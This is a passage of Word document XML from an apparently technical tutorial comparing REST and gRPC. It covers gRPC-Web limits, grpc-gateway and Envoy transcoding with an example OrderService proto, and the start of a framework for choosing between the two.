      </w:r>
    </w:p>
    <w:p w14:paraId="554AC00C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Client streaming: NOT supported (HTTP/1.1 doesn't support it)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB67257" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Bidirectional: NOT supported (HTTP/1.1 limitation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054D2F41" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1A7433" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  gRPC-Web vs REST for browser clients:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE8D371" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    gRPC-Web: type safety (generated client), binary format, streaming</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51048D43" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    REST/JSON: simpler, no code generation, easier debugging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36AC1CE1" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    gRPC-Web wins: when type safety and streaming are important</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DCBFE7" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    REST wins: when simplicity and debuggability are priorities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46BAC46E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>gRPC Transcoding — REST ↔ gRPC translation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060E7CB1" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D245C6" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>grpc-gateway: generates reverse-proxy from .proto annotations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CBB4F7" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Client: calls REST endpoint (JSON)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EEA4145" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  grpc-gateway: translates JSON → Protobuf, REST method → gRPC method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD6D03B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Backend: receives normal gRPC call</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AFF2AF2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="6A1F52A3" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>// Proto annotation for HTTP transcoding:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB2376B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>import "google/api/annotations.proto";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2604D58B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="22810EE3" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>service OrderService {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C24E8B1" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  rpc GetOrder(GetOrderRequest) returns (Order) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFF9A0E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    option (google.api.http) = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC5D710" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      get: "/v1/orders/{order_id}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D861B2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2628BE43" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0417C698" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2A55D1" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  rpc CreateOrder(CreateOrderRequest) returns (CreateOrderResponse) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362AE6ED" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    option (google.api.http) = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E9EE30" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      post: "/v1/orders"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776363FA" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      body: "*"  // use entire request body as proto message</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AFF6508" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D3BD71" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40179A94" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6491E36D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  rpc UpdateOrderStatus(UpdateOrderStatusRequest) returns (Order) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BCEA743" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    option (google.api.http) = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F386F0" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      patch: "/v1/orders/{order_id}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068C779D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      body: "status"  // only "status" field from body maps to proto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D56E04" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      additional_bindings {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77EA8131" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        put: "/v1/orders/{order_id}/status"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6B2AA9" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">      }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C508AF4" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38EFB2B2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA71A79" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAF7C8E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  rpc ListOrders(ListOrdersRequest) returns (ListOrdersResponse) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264A434E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    option (google.api.http) = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A04DA83" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      get: "/v1/users/{user_id}/orders"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773F7887" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      // Query params: status_filter, page_size, page_token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FFC1F0" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66BFE76E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1E5F98" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074634FF" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="2B6BC7F8" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Generated behavior:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E34ACF" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  GET /v1/orders/ord_123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB9DF9D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  → grpc-gateway maps {order_id} → GetOrderRequest{order_id: "ord_123"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C4398B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  → calls gRPC GetOrder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE0431D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  → Order proto → JSON → HTTP response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7BA385" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453D2C6A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  POST /v1/orders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DDA52A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Body: {"user_id": "usr_123", "items": [...]}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1016211D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  → grpc-gateway deserializes JSON → CreateOrderRequest proto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C011BBE" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  → calls gRPC CreateOrder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1192296F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  → CreateOrderResponse proto → JSON → HTTP 201 response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4C3FE5" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3C135A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Envoy transcoding (no additional service):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ABF3165" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Envoy filter: grpc_json_transcoder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D6D764" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Same annotation-based configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24120028" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Translation happens at Envoy layer (not separate gateway process)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619CB66D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540F60C4" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Benefit: one service, dual protocol access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0031FE" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">           Clients: choose REST or gRPC based on their needs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8AC19A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5532132D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Google Cloud Endpoints and API Gateway:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D168434" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Managed transcoding service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DABD71" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Deploy .proto with HTTP annotations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A2904F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Cloud handles REST → gRPC translation, auth, rate limiting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8714FE" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:pict w14:anchorId="2F224F65">
          <v:rect id="_x0000_i6621" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="753D3C7F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6. REST vs gRPC — The Decision Framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4946C760" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>When to Use Each — The Engineering Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5B95CD" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438EB0D7" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Use REST when:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5422FA00" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="5CDDC04B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>1. External-facing public API:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4226E579" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   Consumers: unknown, diverse, may not control language/runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693E1FD5" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   REST: universally supported (every language has HTTP client)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F581628" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   gRPC: requires proto support (most languages have it, but more setup)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4156C5F6" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F54882" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   Browser clients: REST is simpler (gRPC-Web is possible but more complex)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34EB6A69" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   Mobile clients: REST is conventional (gRPC works but REST more common)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465E070D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   Third-party integrations: REST has better tooling (Postman, curl, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20414D73" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0444F273" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>2. Simple CRUD with no streaming:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6415C5B2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">   REST: simple, stateless, cacheable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324E260A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   gRPC: overhead of proto compilation for no significant benefit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B162871" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1A7CF3" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   If: payload &lt; 1KB, &lt;1000 RPS, no streaming needs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F384088" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   Then: REST/JSON is simpler with negligible performance difference</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C107B78" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5D912C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>3. Strong caching requirements:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53971216" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   REST: HTTP caching semantics (CDN, browser cache, reverse proxy)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659DAC4F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   gRPC: no standard caching mechanism (POST to /ServiceMethod isn't cached)</w:t>
      </w:r>
    </w:p>
